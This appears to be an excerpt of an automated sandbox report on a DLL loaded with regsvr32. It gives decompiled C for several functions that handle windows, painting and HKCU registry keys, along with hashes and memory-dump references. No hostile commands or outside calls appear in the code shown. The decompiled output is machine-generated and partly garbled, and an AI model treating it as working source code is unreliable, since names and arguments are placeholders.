                                                                                                                0x00000000
                                                                                                                0x10026e94
                                                                                                                0x00000000
                                                                                                                0x10026e91
                                                                                                                0x10026e9f
                                                                                                                0x10026eb7
                                                                                                                0x10026eb7
                                                                                                                0x10026eb9
                                                                                                                0x10026ebb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10026eab
                                                                                                                0x10026ead
                                                                                                                0x10026eaf
                                                                                                                0x00000000
                                                                                                                0x10026eb1
                                                                                                                0x10026eb2
                                                                                                                0x00000000
                                                                                                                0x10026eb2
                                                                                                                0x00000000
                                                                                                                0x10026eaf
                                                                                                                0x10026ebd
                                                                                                                0x10026ec1
                                                                                                                0x10026ec6
                                                                                                                0x10026ec8
                                                                                                                0x10026ed2
                                                                                                                0x10026ee9
                                                                                                                0x10026ee9
                                                                                                                0x10026eeb
                                                                                                                0x10026eed
                                                                                                                0x10026eee
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10026edd
                                                                                                                0x10026edf
                                                                                                                0x10026ee1
                                                                                                                0x10026ee4
                                                                                                                0x00000000
                                                                                                                0x10026ee4
                                                                                                                0x00000000
                                                                                                                0x10026ee1
                                                                                                                0x10026f01
                                                                                                                0x00000000
                                                                                                                0x10026eca
                                                                                                                0x00000000
                                                                                                                0x10026eca
                                                                                                                0x10026ec8
                                                                                                                0x10019ea7
                                                                                                                0x1000a069
                                                                                                                0x1000a069
                                                                                                                0x1000a06c
                                                                                                                0x1000a076
                                                                                                                0x1000a07d
                                                                                                                0x1000a082
                                                                                                                0x1000a083
                                                                                                                0x1000a08a
                                                                                                                0x1000a099
                                                                                                                0x1000a09b
                                                                                                                0x1000a09e
                                                                                                                0x1000a0a2
                                                                                                                0x1000a0a5
                                                                                                                0x1000a0a7
                                                                                                                0x1000a0a7
                                                                                                                0x1000a0b1
                                                                                                                0x1000a0b1
                                                                                                                0x10019e88
                                                                                                                0x10019e88
                                                                                                                0x10019e8d
                                                                                                                0x00000000
                                                                                                                0x10019e94
                                                                                                                0x10019e9a
                                                                                                                0x10019e9a
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                                • String ID:
                                                                                                                • API String ID: 3219385341-0
                                                                                                                • Opcode ID: 0f9cf2f9a770d9057ca46717b984a156014cd5c889fc452cf32eb1698ca24344
                                                                                                                • Instruction ID: c83883cea261492dbcc6de6b44b63371930bd8a8e6fe2a30bc088c65533c2fe6
                                                                                                                • Opcode Fuzzy Hash: 0f9cf2f9a770d9057ca46717b984a156014cd5c889fc452cf32eb1698ca24344
                                                                                                                • Instruction Fuzzy Hash: 4B312179704216EBDE21EB24EC84DAF76ECEF8A6C5B170479F800CB211CB32DC4196A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10014118 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10014118(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t43;
				struct HWND__* _t48;
				long _t61;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E10019F12();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x24)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x48));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x48)) = 0;
				}
				_t64 =  *(_t72 + 0x4c);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
				_t83 =  *(_t72 + 0x3c) & 1;
				if(( *(_t72 + 0x3c) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E1001E375(1, _t64, _t69, _t72, _t83) + 0x3c));
					if(_t71 != 0) {
						_t85 =  *(_t71 + 0x20);
						if( *(_t71 + 0x20) != 0) {
							E10049170(_t71,  &_v52, 0, 0x30);
							_t48 =  *(_t72 + 0x20);
							_v44 = _t48;
							_v40 = _t48;
							_v52 = 0x28;
							_v48 = 1;
							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
						}
					}
				}
				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
				E10013F46(_t61, _t72, GetWindowLongA, _t85);
				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
					}
				}
				E10014064(_t61, _t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}



















                                                                                                                0x10014121
                                                                                                                0x10014128
                                                                                                                0x1001412e
                                                                                                                0x10014133
                                                                                                                0x10014158
                                                                                                                0x10014158
                                                                                                                0x1001415e
                                                                                                                0x10014160
                                                                                                                0x10014160
                                                                                                                0x1001415e
                                                                                                                0x10014163
                                                                                                                0x10014168
                                                                                                                0x1001416c
                                                                                                                0x1001416f
                                                                                                                0x1001416f
                                                                                                                0x10014172
                                                                                                                0x1001417a
                                                                                                                0x1001417f
                                                                                                                0x1001417f
                                                                                                                0x10014182
                                                                                                                0x10014186
                                                                                                                0x10014189
                                                                                                                0x10014190
                                                                                                                0x10014195
                                                                                                                0x10014197
                                                                                                                0x1001419b
                                                                                                                0x100141a5
                                                                                                                0x100141aa
                                                                                                                0x100141b0
                                                                                                                0x100141b3
                                                                                                                0x100141c4
                                                                                                                0x100141cb
                                                                                                                0x100141ce
                                                                                                                0x100141ce
                                                                                                                0x1001419b
                                                                                                                0x10014195
                                                                                                                0x100141e4
                                                                                                                0x100141e6
                                                                                                                0x100141f5
                                                                                                                0x10014201
                                                                                                                0x10014205
                                                                                                                0x1001420d
                                                                                                                0x1001420d
                                                                                                                0x10014205
                                                                                                                0x10014215
                                                                                                                0x10014228

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LongWindow$MessageSend_memset
                                                                                                                • String ID: (
                                                                                                                • API String ID: 2997958587-3887548279
                                                                                                                • Opcode ID: 6b22b949b9ce932dd13ac654eb79d8cff91feb19b65ffa35852a87b5f37b679d
                                                                                                                • Instruction ID: c82c6814ec38e1b5b6b101697f8324302a63334789065a76628bdfc54f8d4eea
                                                                                                                • Opcode Fuzzy Hash: 6b22b949b9ce932dd13ac654eb79d8cff91feb19b65ffa35852a87b5f37b679d
                                                                                                                • Instruction Fuzzy Hash: 5031B074A00711AFDB10DFB4C888A9EB7E8FF48650B13056DF5529B6A1DB30E880CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10032CDF Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E10032CDF(void* __ebx, void* __ecx) {
				void* __ebp;
				void* _t28;
				void* _t36;
				signed char _t37;
				intOrPtr _t41;
				void* _t42;
				void* _t44;
				intOrPtr _t45;
				void* _t46;

				_t39 = __ecx;
				_t36 = __ebx;
				_t41 =  *((intOrPtr*)(_t46 + 0x10));
				if(_t41 == 0) {
					_t45 =  *((intOrPtr*)(_t46 + 0x10));
					L14:
					_t42 = E10013FEA(_t36, _t39, _t45, GetTopWindow( *(_t45 + 0x20)));
					if(_t42 != 0) {
						L7:
						if((GetWindowLongA( *(_t42 + 0x20), 0xffffffec) & 0x00010000) == 0) {
							L18:
							return _t42;
						}
						_push(_t36);
						_t37 =  *(_t46 + 0x1c);
						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x20)) != 0) {
							if((_t37 & 0x00000002) == 0) {
								L16:
								_push(_t37);
								_push(0);
								_push(_t42);
								goto L17;
							}
							_t39 = _t42;
							if(E1001795E(_t42) != 0) {
								goto L16;
							}
							goto L12;
						} else {
							L12:
							_push(_t37);
							_push(_t42);
							_push(_t45);
							L17:
							_t42 = E10032CDF(_t37, _t39);
							goto L18;
						}
					}
					return _t45;
				}
				_t28 = E10013FEA(__ebx, _t39, _t44, GetWindow( *(_t41 + 0x20), 2));
				_t45 =  *((intOrPtr*)(_t46 + 0x10));
				while(_t28 == 0) {
					_t41 = E10032C8A(_t45, E10013FEA(_t36, _t39, _t45, GetParent( *(_t41 + 0x20))));
					if(_t41 == 0 || _t41 == _t45) {
						goto L14;
					} else {
						_t28 = E10013FEA(_t36, _t39, _t45, GetWindow( *(_t41 + 0x20), 2));
						continue;
					}
				}
				_t42 = E10013FEA(_t36, _t39, _t45, GetWindow( *(_t41 + 0x20), 2));
				goto L7;
			}












                                                                                                                0x10032cdf
                                                                                                                0x10032cdf
                                                                                                                0x10032ce1
                                                                                                                0x10032ce8
                                                                                                                0x10032d88
                                                                                                                0x10032d8c
                                                                                                                0x10032d9b
                                                                                                                0x10032d9f
                                                                                                                0x10032d4a
                                                                                                                0x10032d5a
                                                                                                                0x10032db1
                                                                                                                0x00000000
                                                                                                                0x10032db1
                                                                                                                0x10032d5c
                                                                                                                0x10032d5d
                                                                                                                0x10032d64
                                                                                                                0x10032d76
                                                                                                                0x10032da5
                                                                                                                0x10032da5
                                                                                                                0x10032da6
                                                                                                                0x10032da8
                                                                                                                0x00000000
                                                                                                                0x10032da8
                                                                                                                0x10032d78
                                                                                                                0x10032d81
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10032d83
                                                                                                                0x10032d83
                                                                                                                0x10032d83
                                                                                                                0x10032d84
                                                                                                                0x10032d85
                                                                                                                0x10032da9
                                                                                                                0x10032dae
                                                                                                                0x00000000
                                                                                                                0x10032db0
                                                                                                                0x10032d64
                                                                                                                0x00000000
                                                                                                                0x10032da1
                                                                                                                0x10032cfd
                                                                                                                0x10032d02
                                                                                                                0x10032d36
                                                                                                                0x10032d1e
                                                                                                                0x10032d22
                                                                                                                0x00000000
                                                                                                                0x10032d28
                                                                                                                0x10032d31
                                                                                                                0x00000000
                                                                                                                0x10032d31
                                                                                                                0x10032d22
                                                                                                                0x10032d48
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetWindow.USER32(?,00000002), ref: 10032CFA
                                                                                                                • GetParent.USER32(?), ref: 10032D0B
                                                                                                                • GetWindow.USER32(?,00000002), ref: 10032D2E
                                                                                                                • GetWindow.USER32(?,00000002), ref: 10032D40
                                                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 10032D4F
                                                                                                                • IsWindowVisible.USER32(?), ref: 10032D69
                                                                                                                • GetTopWindow.USER32(?), ref: 10032D8F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$LongParentVisible
                                                                                                                • String ID:
                                                                                                                • API String ID: 506644340-0
                                                                                                                • Opcode ID: fa9f5f524476207fbf08464c865b90a75efb3f529bc22b917ca692e7b6724187
                                                                                                                • Instruction ID: 7fbb9b8bb4128a6ebb760fd7c23c45e267de0c3fd4b5490f83dbd2ad19ab79f8
                                                                                                                • Opcode Fuzzy Hash: fa9f5f524476207fbf08464c865b90a75efb3f529bc22b917ca692e7b6724187
                                                                                                                • Instruction Fuzzy Hash: 9E21B032A00626AFEA62EB708C19F9F77ECFF44681F064528F985AF161D621EC01C790
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10043D2F Relevance: 10.6, APIs: 7, Instructions: 69windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 68%
                                                                                                                			E10043D2F(void* __ecx) {
				struct tagMSG _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t21;
				intOrPtr _t24;
				int _t31;
				intOrPtr _t33;
				void* _t38;
				void* _t39;
				int _t40;

				_push(0);
				_t39 = __ecx;
				_t40 = 0xf;
				while(PeekMessageA( &_v28, 0, _t40, _t40, ??) != 0) {
					_t21 = GetMessageA( &_v28, 0, _t40, _t40);
					__eflags = _t21;
					if(__eflags != 0) {
						DispatchMessageA( &_v28);
						_push(0);
						continue;
					}
					return _t21;
				}
				_t24 =  *((intOrPtr*)(_t39 + 0x68));
				_t36 =  *((intOrPtr*)(_t24 + 0x84));
				 *((intOrPtr*)(_t39 + 0x70)) =  *((intOrPtr*)(_t24 + 0x84));
				 *(_t39 + 0x78) =  *(_t24 + 0x80) & 0x0000f000;
				SetRectEmpty(_t39 + 0xc);
				 *((intOrPtr*)(_t39 + 0x20)) = 0;
				 *((intOrPtr*)(_t39 + 0x1c)) = 0;
				 *((intOrPtr*)(_t39 + 0x24)) = 0;
				 *((intOrPtr*)(_t39 + 0x7c)) = 0;
				 *((intOrPtr*)(_t39 + 0x80)) = 0;
				_t38 = E10013FEA(0,  *((intOrPtr*)(_t24 + 0x84)), _t40, GetDesktopWindow());
				_t31 = LockWindowUpdate( *(_t38 + 0x20));
				_t43 = _t31;
				if(_t31 == 0) {
					_push(3);
				} else {
					_push(0x403);
				}
				_push(GetDCEx( *(_t38 + 0x20), 0, ??));
				_t33 = E1000CCCE(0, _t36, _t38, _t39, _t43);
				 *((intOrPtr*)(_t39 + 0x84)) = _t33;
				return _t33;
			}















                                                                                                                0x10043d3e
                                                                                                                0x10043d41
                                                                                                                0x10043d43
                                                                                                                0x10043d68
                                                                                                                0x10043d4e
                                                                                                                0x10043d54
                                                                                                                0x10043d56
                                                                                                                0x10043d61
                                                                                                                0x10043d67
                                                                                                                0x00000000
                                                                                                                0x10043d67
                                                                                                                0x10043ded
                                                                                                                0x10043ded
                                                                                                                0x10043d76
                                                                                                                0x10043d79
                                                                                                                0x10043d7f
                                                                                                                0x10043d8d
                                                                                                                0x10043d94
                                                                                                                0x10043d9a
                                                                                                                0x10043d9d
                                                                                                                0x10043da0
                                                                                                                0x10043da3
                                                                                                                0x10043da6
                                                                                                                0x10043db8
                                                                                                                0x10043dbd
                                                                                                                0x10043dc3
                                                                                                                0x10043dc5
                                                                                                                0x10043dce
                                                                                                                0x10043dc7
                                                                                                                0x10043dc7
                                                                                                                0x10043dc7
                                                                                                                0x10043dda
                                                                                                                0x10043ddb
                                                                                                                0x10043de0
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetMessageA.USER32 ref: 10043D4E
                                                                                                                • DispatchMessageA.USER32 ref: 10043D61
                                                                                                                • PeekMessageA.USER32(00000000,00000000,0000000F,0000000F,00000000), ref: 10043D70
                                                                                                                • SetRectEmpty.USER32(?), ref: 10043D94
                                                                                                                • GetDesktopWindow.USER32 ref: 10043DAC
                                                                                                                • LockWindowUpdate.USER32(?), ref: 10043DBD
                                                                                                                • GetDCEx.USER32 ref: 10043DD4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1192691108-0
                                                                                                                • Opcode ID: 84d8b26e7ebad14b7531b127a920c320bb276a2296806e924b7d622da3e51ed5
                                                                                                                • Instruction ID: 839274ef87aa8f2479dcd51d4f325cfe662143961794ff2ef2d296bc339d2c34
                                                                                                                • Opcode Fuzzy Hash: 84d8b26e7ebad14b7531b127a920c320bb276a2296806e924b7d622da3e51ed5
                                                                                                                • Instruction Fuzzy Hash: B5214DB2900705AFE3109F65CD88E97BBECFB09255F41497EF556C6520DB35E8048B20
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000F232 Relevance: 10.6, APIs: 7, Instructions: 67windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E1000F232(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t34;
				void* _t36;
				void* _t50;
				void* _t68;
				void* _t70;
				void* _t71;

				_push(0x18);
				_t34 = E1004764D(0x1008e378, __ebx, __edi, __esi);
				_t70 = __ecx;
				_t73 =  *(_t71 + 8) - 0xffffffff;
				if( *(_t71 + 8) != 0xffffffff) {
					_t36 = E1001FDD8(__ebx, __edi, __ecx, _t73);
					GetClientRect( *(_t70 + 0x20), _t71 - 0x24);
					 *(_t71 - 0x10) =  *(_t71 - 0x10) & 0x00000000;
					 *((intOrPtr*)(_t71 - 0x14)) = 0x1009b784;
					 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
					L1000CFA3(_t71 - 0x14, __edi, _t71, CreateRectRgnIndirect(_t71 - 0x24));
					_push(GetDC( *(_t70 + 0x20)));
					_t68 = E1000CCCE(_t36, _t71 - 0x14, __edi, _t70, _t73);
					E1000C878(_t68, _t71 - 0x14);
					SendMessageA( *(_t70 + 0x20), 0x198,  *(_t71 + 8), _t71 - 0x24);
					 *(_t71 - 0x20) =  *(_t71 - 0x20) - 2;
					 *((intOrPtr*)(_t71 - 0x18)) =  *(_t71 - 0x20) + 2;
					_t50 = E1000D13A(_t68, _t36);
					PatBlt( *(_t68 + 4),  *(_t71 - 0x24),  *(_t71 - 0x20),  *((intOrPtr*)(_t71 - 0x1c)) -  *(_t71 - 0x24),  *((intOrPtr*)(_t71 - 0x18)) -  *(_t71 - 0x20), 0x5a0049);
					E1000D13A(_t68, _t50);
					ReleaseDC( *(_t70 + 0x20),  *(_t68 + 4));
					 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t71 - 0x14)) = 0x10098308;
					_t34 = L1000CFF6(_t71 - 0x14);
				}
				return E10047725(_t34);
			}









                                                                                                                0x1000f232
                                                                                                                0x1000f239
                                                                                                                0x1000f23e
                                                                                                                0x1000f240
                                                                                                                0x1000f244
                                                                                                                0x1000f24a
                                                                                                                0x1000f258
                                                                                                                0x1000f25e
                                                                                                                0x1000f262
                                                                                                                0x1000f269
                                                                                                                0x1000f27b
                                                                                                                0x1000f289
                                                                                                                0x1000f28f
                                                                                                                0x1000f297
                                                                                                                0x1000f2ab
                                                                                                                0x1000f2b4
                                                                                                                0x1000f2be
                                                                                                                0x1000f2c1
                                                                                                                0x1000f2e4
                                                                                                                0x1000f2ed
                                                                                                                0x1000f2f8
                                                                                                                0x1000f2fe
                                                                                                                0x1000f305
                                                                                                                0x1000f30c
                                                                                                                0x1000f30c
                                                                                                                0x1000f316

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1000F239
                                                                                                                  • Part of subcall function 1001FDD8: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 1001FE1E
                                                                                                                  • Part of subcall function 1001FDD8: CreatePatternBrush.GDI32(00000000), ref: 1001FE2B
                                                                                                                  • Part of subcall function 1001FDD8: DeleteObject.GDI32(00000000), ref: 1001FE37
                                                                                                                • GetClientRect.USER32 ref: 1000F258
                                                                                                                • CreateRectRgnIndirect.GDI32(?), ref: 1000F271
                                                                                                                • GetDC.USER32(?), ref: 1000F283
                                                                                                                  • Part of subcall function 1000C878: SelectClipRgn.GDI32(?,00000000), ref: 1000C89A
                                                                                                                  • Part of subcall function 1000C878: SelectClipRgn.GDI32(?,00000004), ref: 1000C8B0
                                                                                                                • SendMessageA.USER32 ref: 1000F2AB
                                                                                                                  • Part of subcall function 1000D13A: SelectObject.GDI32(?,00000000), ref: 1000D15C
                                                                                                                  • Part of subcall function 1000D13A: SelectObject.GDI32(?,00000004), ref: 1000D172
                                                                                                                • PatBlt.GDI32(?,?,00000002,?,00000002,005A0049), ref: 1000F2E4
                                                                                                                • ReleaseDC.USER32(00000002,?), ref: 1000F2F8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Select$CreateObject$ClipRect$BitmapBrushClientDeleteH_prolog3IndirectMessagePatternReleaseSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 330565451-0
                                                                                                                • Opcode ID: 6186e9cc5a34a70b238502e19c0a2f34d54109da1cebe8bcd7e3b9df80bdff20
                                                                                                                • Instruction ID: ae825c2a38aadfa6ad2d5e23964ba6a6f6cc26f5f9c6a76fa10b4d73fef854a5
                                                                                                                • Opcode Fuzzy Hash: 6186e9cc5a34a70b238502e19c0a2f34d54109da1cebe8bcd7e3b9df80bdff20
                                                                                                                • Instruction Fuzzy Hash: 35212876900209EFDB01DBE4CE899EEBBB9FF48311B504258F146B21A0DB35AA10DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10025EBB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10025EBB(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}









                                                                                                                0x10025ed6
                                                                                                                0x10025edd
                                                                                                                0x10025ee0
                                                                                                                0x10025ee3
                                                                                                                0x10025ee6
                                                                                                                0x10025ef1
                                                                                                                0x10025f28
                                                                                                                0x10025f28
                                                                                                                0x10025f33
                                                                                                                0x10025f38
                                                                                                                0x10025f38
                                                                                                                0x10025f3d
                                                                                                                0x10025f42
                                                                                                                0x10025f42
                                                                                                                0x10025f4b

                                                                                                                APIs
                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10025EE9
                                                                                                                • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10025F0C
                                                                                                                • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10025F28
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10025F38
